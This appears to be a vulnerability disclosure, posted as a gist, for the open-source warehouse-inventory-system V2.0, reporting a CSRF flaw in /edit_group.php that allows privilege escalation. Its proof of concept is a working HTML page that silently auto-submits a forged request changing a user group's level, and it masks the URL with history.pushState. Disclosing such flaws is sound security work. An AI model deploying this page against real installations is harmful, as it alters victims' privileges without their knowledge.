topsky979/warehouse-inventory-system_CSRF_8.md Secret

## warehouse-inventory-system_CSRF_8.md

      
    Raw
  

              warehouse-inventory-system_CSRF_8.md
            
          
    [description]
warehouse-inventory-system was discovered to contain Cross-site request forgery(CSRF) vulnerability via the URI /edit_group.php.

[Vulnerability Type]
Cross-site request forgery(CSRF)

[Vendor of Product]
OSWAPP,https://github.com/siamon123/warehouse-inventory-system

[Affected Product Code Base]
V2.0

[Impact Escalation of Privileges]
true

[POC]
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://192.168.0.183:11180/edit_group.php?id=4" method="POST">
      <input type="hidden" name="group&#45;name" value="Test2" />
      <input type="hidden" name="group&#45;level" value="5" />
      <input type="hidden" name="status" value="1" />
      <input type="hidden" name="update" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>